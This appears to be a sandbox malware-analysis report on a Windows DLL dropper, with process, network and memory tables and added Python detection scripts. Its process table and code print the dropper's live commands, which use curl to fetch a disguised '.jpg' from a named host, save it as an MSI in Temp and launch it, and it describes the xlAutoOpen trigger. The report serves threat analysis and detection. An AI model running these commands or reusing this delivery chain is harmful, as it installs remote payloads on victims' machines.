Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll | PE32+ executable (DLL) (GUI) x86-64, for MS Windows | initial sample | |
| C:\Users\user\AppData\Local\Temp\spclwow78x.msi | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2 | modified | |
| \Device\ConDrv | ASCII text, with CR, LF line terminators | dropped | |
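The file table shows the practical point of this dropper: the URL it fetches ends in .jpg, but what lands in Temp is a Composite Document File (the MSI container), wrapped with the exemsi MSI Wrapper and carrying Microsoft-looking metadata. The check below is an added example, not part of the sandbox report: it classifies a blob by its leading bytes, decodes the fixed fields of the CFB header to confirm the container is well formed, and flags a URL whose extension does not match the delivered content. The CFB header bytes it builds are constructed for the example; they are not bytes from the real spclwow78x.msi.

```python
import struct
from urllib.parse import urlsplit

# Leading bytes of the container types that appear in this report.
CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # Compound File Binary (MSI, legacy Office)
PE_MAGIC = b"MZ"                                   # PE image (the DropperX-gen DLL)
JPEG_MAGIC = b"\xFF\xD8\xFF"                       # what a genuine UIServices.jpg would start with

# Sniffed type each URL/file extension is expected to deliver.
EXPECTED = {"jpg": "jpeg", "jpeg": "jpeg", "msi": "cfb", "dll": "pe", "exe": "pe"}


def sniff(data: bytes) -> str:
    """Classify by magic bytes only, never by the name the server or dropper chose."""
    if data.startswith(CFB_MAGIC):
        return "cfb"
    if data.startswith(PE_MAGIC):
        return "pe"
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    return "unknown"


def parse_cfb_header(data: bytes) -> dict:
    """Decode the fixed fields of the 512-byte CFB header (MS-CFB section 2.2).

    Offsets: 0 signature, 8 CLSID, 24 minor version, 26 major version,
    28 byte-order mark, 30 sector shift, 32 mini sector shift.
    """
    if len(data) < 512 or not data.startswith(CFB_MAGIC):
        raise ValueError("not a compound file header")
    minor, major, bom, sector_shift, mini_shift = struct.unpack_from("<HHHHH", data, 24)
    if bom != 0xFFFE:
        raise ValueError("bad byte-order mark 0x%04X" % bom)
    # v3 files use 512-byte sectors (shift 9), v4 files 4096-byte sectors (shift 12).
    if (major, sector_shift) not in ((3, 9), (4, 12)):
        raise ValueError("inconsistent major version / sector shift")
    return {"major": major, "minor": minor,
            "sector_size": 1 << sector_shift, "mini_sector_size": 1 << mini_shift}


def url_extension(url: str) -> str:
    name = urlsplit(url).path.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def extension_mismatch(url: str, data: bytes) -> bool:
    """True when the served bytes are not the type the URL's extension advertises."""
    expected = EXPECTED.get(url_extension(url))
    return expected is not None and sniff(data) != expected


def constructed_cfb() -> bytes:
    """A minimal, constructed CFB header (not bytes from the real spclwow78x.msi):
    major version 3, 512-byte sectors, 64-byte mini sectors."""
    hdr = bytearray(512)
    hdr[0:8] = CFB_MAGIC
    struct.pack_into("<HHHHH", hdr, 24, 0x003E, 0x0003, 0xFFFE, 0x0009, 0x0006)
    return bytes(hdr)


if __name__ == "__main__":
    url = "http://anydesk10.hospedagemdesites.ws/UIServices.jpg"
    blob = constructed_cfb()
    print(sniff(blob), parse_cfb_header(blob), extension_mismatch(url, blob))
```

Run the same three calls against the real file taken from Temp in a sandbox to confirm the mismatch; the sector-shift consistency check is there because a blob that merely starts with the CFB signature is not yet a parseable MSI.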
Processes

| Path | Cmdline | Malicious |
|---|---|---|
| C:\Windows\System32\loaddll64.exe | loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll" | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\System32\cmd.exe | cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1 | |
| C:\Windows\System32\rundll32.exe | rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen | |
| C:\Windows\System32\rundll32.exe | rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1 | |
| C:\Windows\System32\cmd.exe | cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi | |
| C:\Windows\System32\cmd.exe | cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\System32\cmd.exe | cmd /C %temp%\spclwow78x.msi | |
| C:\Windows\System32\cmd.exe | cmd /C %temp%\spclwow78x.msi | |
| C:\Windows\System32\curl.exe | curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi | |
| C:\Windows\System32\curl.exe | curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\System32\rundll32.exe | rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen | |
| C:\Windows\System32\cmd.exe | cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\System32\cmd.exe | cmd /C %temp%\spclwow78x.msi | |
| C:\Windows\System32\curl.exe | curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |

11 further processes are not shown.
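The process table is the report's main evidence. The sandbox harness (loaddll64.exe) runs the DLL three times, twice through the xlAutoOpen export and once through ordinal #1, and the counts line up: three rundll32 instances, three "cmd /C curl ... -o %temp%\spclwow78x.msi" downloads, three "cmd /C %temp%\spclwow78x.msi" launches. xlAutoOpen is the entry point Excel calls when it loads an XLL add-in, so the DLL is built to run when opened as an add-in; calling it through rundll32 is the harness's way of triggering it, and in production the cmd/curl children under rundll32 are the higher-fidelity signal. The detection logic below is an added example, not part of the report or the sandbox's own rules. The events are constructed from the Path/Cmdline columns; the report shows no pids or parent pids, so the parent/child tree is an assumption that follows the command lines.

```python
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the Path/Cmdline columns above. Pids and ppids are assumed:
# loaddll64 -> rundll32 (xlAutoOpen) -> cmd -> curl, and rundll32 -> cmd -> .msi.
SAMPLE = r"C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll"
URL = "http://anydesk10.hospedagemdesites.ws/UIServices.jpg"
EVENTS = [
    Proc(100, 1, r"C:\Windows\System32\loaddll64.exe", f'loaddll64.exe "{SAMPLE}"'),
    Proc(101, 100, r"C:\Windows\System32\cmd.exe", f'cmd.exe /C rundll32.exe "{SAMPLE}",#1'),
    Proc(102, 100, r"C:\Windows\System32\rundll32.exe", f"rundll32.exe {SAMPLE},xlAutoOpen"),
    Proc(103, 102, r"C:\Windows\System32\cmd.exe", rf"cmd /C curl {URL} -o %temp%\spclwow78x.msi"),
    Proc(104, 103, r"C:\Windows\System32\curl.exe",
         rf"curl {URL} -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi"),
    Proc(105, 102, r"C:\Windows\System32\cmd.exe", r"cmd /C %temp%\spclwow78x.msi"),
    Proc(106, 1, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# rundll32 <dll>,<export>; the XLL add-in entry points are what Excel itself would call.
RUNDLL_EXPORT = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)"?,\s*(#\d+|[A-Za-z_]\w*)', re.I)
XLL_EXPORTS = {"xlautoopen", "xlautoclose", "xlautoadd", "xlautoremove", "xladdinmanagerinfo"}
CURL_OUT = re.compile(r"\bcurl(?:\.exe)?\s+(\S+).*?\s-o\s+(\S+)", re.I)
CMD_RUNS_MSI = re.compile(r"\bcmd(?:\.exe)?\s+/c\s+(\S+\.msi)\b", re.I)
TEMP_DIR = re.compile(r"(?:%temp%|\\AppData\\Local\\Temp)\\", re.I)


def _ext(path: str) -> str:
    name = re.split(r"[\\/]", path.strip('"'))[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def check_process(p: Proc) -> list:
    """Per-process rules; each hit is a short reason string."""
    hits = []
    m = RUNDLL_EXPORT.search(p.cmdline)
    if m and m.group(2).lower() in XLL_EXPORTS:
        hits.append(f"rundll32 drives XLL entry point {m.group(2)} of {m.group(1)}")
    m = CURL_OUT.search(p.cmdline)
    # Download into Temp whose URL extension differs from the saved extension.
    if m and TEMP_DIR.search(m.group(2)) and _ext(m.group(1)) != _ext(m.group(2)):
        hits.append(f"curl saves .{_ext(m.group(1))} URL as .{_ext(m.group(2))} in Temp")
    m = CMD_RUNS_MSI.search(p.cmdline)
    if m and TEMP_DIR.search(m.group(1)):
        hits.append(f"cmd launches MSI from Temp: {m.group(1)}")
    return hits


def ancestors(p: Proc, by_pid: dict, limit: int = 32) -> list:
    """Parent chain, nearest first; stops at an unknown ppid or after `limit` hops."""
    chain = []
    while p.ppid in by_pid and len(chain) < limit:
        p = by_pid[p.ppid]
        chain.append(p)
    return chain


def analyze(events: list) -> list:
    """Run the rules and tag each hit with whether rundll32 sits in its parent chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parents = [a.image.rsplit("\\", 1)[-1].lower() for a in ancestors(e, by_pid)]
        for reason in check_process(e):
            findings.append({"pid": e.pid, "reason": reason,
                             "via_rundll32": "rundll32.exe" in parents})
    return findings


if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

The curl rule deliberately keys on the extension mismatch plus the Temp destination rather than on the hostname, so it survives the infrastructure changing; the MSI rule fires on the launch, which is the point where msiexec would be invoked for a file that was never a .jpg.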
URLs

| Name | IP | Malicious |
|---|---|---|
| http://anydesk10.hospedagemdesites.ws/UIServices.jpg8 | unknown | |
| http://anydesk10.hospedagemdesites.ws/UIServices.jpg-o%temp% | unknown | |
| http://anydesk10.hospedagemdesites.ws/UIServices.jpg4 | unknown | |
| http://anydesk10.hospedagemdesites.ws/UIServices.jpg-oC: | unknown | |
| http://anydesk10.hospedagemdesites.ws/UIServices.jpg | 191.252.51.12 | |

The first four entries are string-carving variants of the last one: the URL as found in memory ran into the adjacent "-o %temp%" or "-o C:" argument of the curl command line, or into a trailing byte, and none of them resolved. The network IOC is the plain http://anydesk10.hospedagemdesites.ws/UIServices.jpg, which resolved to 191.252.51.12.
Domains

| Name | IP | Malicious |
|---|---|---|
| anydesk10.hospedagemdesites.ws | 191.252.51.12 | |

IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 191.252.51.12 | anydesk10.hospedagemdesites.ws | Brazil | |
Memdumps

| Base Address | Region type | Protect | Malicious |
|---|---|---|---|
| 1CC78A77000 | heap | page read and write | |
| 211547E0000 | unknown | page read and write | |
| E81E6FD000 | stack | page read and write | |
| 1DCAC57E000 | heap | page read and write | |
| 1DCACB55000 | heap | page read and write | |
| 1DCAC560000 | heap | page read and write | |
| 1E70ED90000 | unknown | page read and write | |
| 2F48A749000 | heap | page read and write | |
| F3596FF000 | unknown | page read and write | |
| 2861D960000 | heap | page read and write | |
| 21154BA9000 | heap | page read and write | |
| 25D5B2A0000 | heap | page read and write | |
| 25DD8C45000 | heap | page read and write | |
| 22534A80000 | heap | page read and write | |
| 2861D5E0000 | unknown | page readonly | |
| 17F1A8E0000 | heap | page read and write | |
| 16A87D2E000 | heap | page read and write | |
| 2F48A499000 | heap | page read and write | |
| 1DCAC57A000 | heap | page read and write | |
| 17F1A9FA000 | heap | page read and write | |
| 25D5B1C0000 | unknown | page read and write | |
| 1DCAC5B7000 | heap | page read and write | |
| 2EA2BDD0000 | heap | page read and write | |
| 2F48A749000 | heap | page read and write | |
| 17F1A930000 | unknown | page readonly | |
| D046EFE000 | stack | page read and write | |
| 25D5B480000 | heap | page read and write | |
| 149D5FF000 | stack | page read and write | |
| 2133061A000 | heap | page read and write | |
| 25D5B1B0000 | unknown | page readonly | |
| 21154BA9000 | heap | page read and write | |
| 2861D810000 | heap | page read and write | |
| 1E70ED80000 | unknown | page readonly | |
| 5AB3D8F000 | stack | page read and write | |
| 1CC788F0000 | heap | page read and write | |
| 2F48A499000 | heap | page read and write | |
| B5199FE000 | stack | page read and write | |
| F7502FF000 | unknown | page read and write | |
| 1DCAC5A8000 | heap | page read and write | |
| 1E70ED90000 | unknown | page read and write | |
| 1DCAC56F000 | heap | page read and write | |
| 2EA2BE90000 | heap | page read and write | |
| 225366E0000 | heap | page read and write | |
| E81E7FF000 | unknown | page read and write | |
| 2F48A350000 | unknown | page read and write | |
| 211547C0000 | unknown | page readonly | |
| 16A87CD0000 | heap | page read and write | |
| 1E70ED70000 | unknown | page readonly | |
| 149D8FE000 | stack | page read and write | |
| 1E70EF20000 | heap | page read and write | |
| 17F1AD40000 | heap | page read and write | |
| EBC11FF000 | stack | page read and write | |
| 2861D5E0000 | unknown | page readonly | |
| 1E70F020000 | heap | page read and write | |
| 2F48A340000 | unknown | page readonly | |
| 25DD86AB000 | heap | page read and write | |
| 16A87B60000 | heap | page read and write | |
| 25DD86BC000 | heap | page read and write | |
| C2342FF000 | unknown | page read and write | |
| 25DD8B00000 | heap | page read and write | |
| 2DCE4FF000 | unknown | page read and write | |
| 17F1ABB0000 | heap | page read and write | |
| 22534AF0000 | heap | page read and write | |
| 1DCAC4A0000 | heap | page read and write | |
| 1E70ED70000 | unknown | page readonly | |
| 5AB407F000 | stack | page read and write | |
| 2861D5D0000 | unknown | page readonly | |
| D046BFE000 | stack | page read and write | |
| 1DCAC572000 | heap | page read and write | |
| 2133060C000 | heap | page read and write | |
| 2F48A340000 | unknown | page readonly | |
| 22534DA0000 | heap | page read and write | |
| 25DD8550000 | heap | page read and write | |
| 25D5B2C0000 | heap | page read and write | |
| 213303E0000 | heap | page read and write | |
| D0467FD000 | stack | page read and write | |
| A54D99C000 | stack | page read and write | |
| 1DCAC530000 | heap | page read and write | |
| A90637F000 | stack | page read and write | |
| 25D5B1A0000 | unknown | page readonly | |
| 25DD86A0000 | heap | page read and write | |
| 2F48A580000 | heap | page read and write | |
| 1DCAC5B0000 | heap | page read and write | |
| 21330601000 | heap | page read and write | |
| 2133061A000 | heap | page read and write | |
| 1CC78A30000 | heap | page read and write | |
| 25D5B380000 | heap | page read and write | |
| 2F48A745000 | heap | page read and write | |
| 22534B6B000 | heap | page read and write | |
| 22534DA5000 | heap | page read and write | |
| 25DD86FC000 | heap | page read and write | |
| 2133060C000 | heap | page read and write | |
| 211547D0000 | unknown | page readonly | |
| 17F1AD45000 | heap | page read and write | |
| 213305CF000 | heap | page read and write | |
| 16A87CE0000 | heap | page read and write | |
| D046AFF000 | stack | page read and write | |
| 2EA2BEA3000 | heap | page read and write | |
| 1CC78D60000 | heap | page read and write | |
| 2F48A330000 | unknown | page readonly | |
| B5197FF000 | stack | page read and write | |
| 17F1A920000 | unknown | page readonly | |
| 1DCAC5A8000 | heap | page read and write | |
| 213305CB000 | heap | page read and write | |
| 17F1A930000 | unknown | page readonly | |
| 1E70F219000 | heap | page read and write | |
| 25DD86C0000 | heap | page read and write | |
| 213305DF000 | heap | page read and write | |
| 21154780000 | heap | page read and write | |
| 25DD86C0000 | heap | page read and write | |
| 211549D0000 | heap | page read and write | |
| 213305C0000 | heap | page read and write | |
| 1DCAC5B7000 | heap | page read and write | |
| 17F1A920000 | unknown | page readonly | |
| 25D5B39A000 | heap | page read and write | |
| B519BFE000 | stack | page read and write | |
| 1CC78D65000 | heap | page read and write | |
| 149D9FE000 | stack | page read and write | |
| B5193DD000 | stack | page read and write | |
| 2EA2BE40000 | heap | page read and write | |
| 1E70F210000 | heap | page read and write | |
| 17F1AD49000 | heap | page read and write | |
| 1DCAC5A8000 | heap | page read and write | |
| 1DCAC57E000 | heap | page read and write | |
| 2EA2BE70000 | heap | page read and write | |
| 25DD86C3000 | heap | page read and write | |
| B5196FF000 | stack | page read and write | |
| 2F48A2F0000 | heap | page read and write | |
| 21330601000 | heap | page read and write | |
| 2861D969000 | heap | page read and write | |
| 17F1A9E0000 | heap | page read and write | |
| 1E70EE70000 | heap | page read and write | |
| 1CC78A70000 | heap | page read and write | |
| 211547C0000 | unknown | page readonly | |
| 211547D0000 | unknown | page readonly | |
| 1E70EF3A000 | heap | page read and write | |
| 1DCAC5A0000 | heap | page read and write | |
| 21330B05000 | heap | page read and write | |
| EBC10FD000 | stack | page read and write | |
| 211547E0000 | unknown | page read and write | |
| 2861D5F0000 | unknown | page read and write | |
| 149D6FF000 | stack | page read and write | |
| 25D5B160000 | heap | page read and write | |
| 2861D5D0000 | unknown | page readonly | |
| A54DCFF000 | stack | page read and write | |
| 21330540000 | heap | page read and write | |
| 2861D5F0000 | unknown | page read and write | |
| 25D5B1B0000 | unknown | page readonly | |
| 149DAFE000 | stack | page read and write | |
| 1DCAC510000 | heap | page read and write | |
| 21330520000 | heap | page read and write | |
| 2F48A480000 | heap | page read and write | |
| 149D4FD000 | stack | page read and write | |
| 2F48A498000 | heap | page read and write | |
| 16A87CA0000 | heap | page read and write | |
| 25D5B2C9000 | heap | page read and write | |
| 2F48A430000 | heap | page read and write | |
| 25DD86E1000 | heap | page read and write | |
| 25DD86E2000 | heap | page read and write | |
| 1DCAC56B000 | heap | page read and write | |
| 211548E8000 | heap | page read and write | |
| F3593FD000 | stack | page read and write | |
| 213305DB000 | heap | page read and write | |
| 22534B67000 | heap | page read and write | |
| 1DCAC5B0000 | heap | page read and write | |
| 1DCAC5A1000 | heap | page read and write | |
| 17F1A950000 | heap | page read and write | |
| 1E70ED30000 | heap | page read and write | |
| 25DD86F3000 | heap | page read and write | |
| 21330600000 | heap | page read and write | |
| 1DCAC5B7000 | heap | page read and write | |
| 1DCAC5A1000 | heap | page read and write | |
| 1DCAC57E000 | heap | page read and write | |
| 2133061A000 | heap | page read and write | |
| 2DCE10D000 | stack | page read and write | |
| 1DCAC576000 | heap | page read and write | |
| 1E70F219000 | heap | page read and write | |
| 2133060C000 | heap | page read and write | |
| 2861D72A000 | heap | page read and write | |
| 2861D710000 | heap | page read and write | |
| C419B7D000 | stack | page read and write | |
| 25DD8C40000 | heap | page read and write | |
| 213305D2000 | heap | page read and write | |
| D046DFE000 | stack | page read and write | |
| 22534B10000 | heap | page read and write | |
| 25D5B1A0000 | unknown | page readonly | |
| 5AB3D0C000 | stack | page read and write | |
| 17F1AD49000 | heap | page read and write | |
| 2F48A740000 | heap | page read and write | |
| 2EA2BE98000 | heap | page read and write | |
| 2861D6D0000 | heap | page read and write | |
| A9062FF000 | stack | page read and write | |
| 2EA2C1D0000 | heap | page read and write | |
| 16A89790000 | heap | page read and write | |
| A54DC7F000 | stack | page read and write | |
| 2F48A330000 | unknown | page readonly | |
| C233F1D000 | stack | page read and write | |
| 21154BA0000 | heap | page read and write | |
| 25D5B389000 | heap | page read and write | |
| 25DD87A0000 | heap | page read and write | |
| 211548D0000 | heap | page read and write | |
| F74FF7D000 | stack | page read and write | |
| 16A87D20000 | heap | page read and write | |
| 21330B00000 | heap | page read and write | |
| 1DCAC582000 | heap | page read and write | |
| 25D5B2C9000 | heap | page read and write | |
| B519AFE000 | stack | page read and write | |
| 1CC7A410000 | heap | page read and write | |
| A90627C000 | stack | page read and write | |
| 2861D969000 | heap | page read and write | |
| 16A87CD5000 | heap | page read and write | |
| 25DD86F3000 | heap | page read and write | |
| D046FFE000 | stack | page read and write | |
| 1CC78A7B000 | heap | page read and write | |
| 2861D590000 | heap | page read and write | |
| 25D5B1C0000 | unknown | page read and write | |
| 17F1A940000 | unknown | page read and write | |
| 1CC78A50000 | heap | page read and write | |
| 17F1A940000 | unknown | page read and write | |
| C419EFF000 | unknown | page read and write | |
| 25DD86FC000 | heap | page read and write | |
| 1DCAC5B0000 | heap | page read and write | |
| 17F1A9E9000 | heap | page read and write | |
| 211549F0000 | heap | page read and write | |
| 1E70ED80000 | unknown | page readonly | |
| 25D5B2C5000 | heap | page read and write | |
| 213305E2000 | heap | page read and write | |
| 1DCACB50000 | heap | page read and write | |
| 2F48A350000 | unknown | page read and write | |
| 213305DF000 | heap | page read and write | |
| 22534B60000 | heap | page read and write | |

221 further memdumps are not shown.